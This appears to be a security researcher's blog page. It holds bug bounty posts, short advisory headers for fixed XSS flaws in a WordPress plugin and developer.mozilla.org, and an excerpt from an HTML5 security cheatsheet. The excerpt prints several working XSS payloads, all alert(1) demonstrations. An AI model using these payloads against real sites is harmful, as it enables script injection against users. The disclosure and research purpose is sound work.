Skip to content

MARKPLAATS.nl Bug Bounty Program #Bounty received

Today I received my bounty for a vulnerability, which I reported for the MARKPLAATS.nl Bug Bounty Program.
 
And here it is … my ‘ebay classifieds whitehat’ :-)
 
 
 
 
 
Really nice, isnt’t it :-) ?
 
In my opinion the MARKPLAATS.nl bug bounty program is one of the good ones, fast feedback and a nice contact, too. 
 
By the way, the vulnerability is not fixed yet, so I will publish the advisory to a later time.
 

Yahoo Bug Bounty Program Vulnerability #2 Open Redirect

In Dec ’13 I reported a Open Redirect (and two other vulnerabilities, first in Nov ’13) to the Yahoo Bug Bounty Program. Sadly, I’ve got no response or feedback for any of this issues,  so I wrote a new message to them (this time via email).
 
Last week they told me that Open redirects are no longer in scope of the bug bounty programm :-/
 
So here is my advisory for this issue:
 
 
Continue reading "Yahoo Bug Bounty Program Vulnerability #2 Open Redirect"

SSCHADV2014-001 - Wordpress Plugin WP-Members Version 2.8.9 - Stored and reflected Cross-site Scripting vulnerabilities

Advisory:
Wordpress Plugin WP-Members 2.8.9 – Multiple Cross-site Scripting vulnerabilities
Advisory ID:
SSCHADV2014-001
Author:
Stefan Schurtz
Affected Software:
Successfully tested on WP-Members Version 2.8.9
Vendor URL:
Vendor Status:
fixed
 
======================
Vulnerability Description
======================
 
The Wordpress plugin "WP-Members 2.8.9" is prone to reflected and stored XSS vulnerabilities
 
Continue reading "SSCHADV2014-001 - Wordpress Plugin WP-Members Version 2.8.9 - Stored and reflected Cross-site Scripting vulnerabilities"

SSCHADV2013-010 - developer.mozilla.org DOMbased Cross-site Scripting vulnerability

Advisory:
developer.mozilla.org - DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-010
Author:
Stefan Schurtz
Affected Software:
Successfully tested on developer.mozilla.org
Vendor URL:
Vendor Status:
fixed
 
 
==========================
Vulnerability Description

==========================

 
The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability
 
 
Continue reading "SSCHADV2013-010 - developer.mozilla.org DOMbased Cross-site Scripting vulnerability"

HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For Example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form
 
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
 
Self-including DOM Worker XSS
 
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
 
0?<script>Worker("#").onmessage=function()eval(.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
 
Self-hijacking JSON literals
 
In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.
 
<script>[{‘a’:Object.prototype.defineSetter(‘b’,function(){alert(arguments[0])}),‘b’:[‘secret’]}]</script>
 
Imprint | Contact | Privacy Statement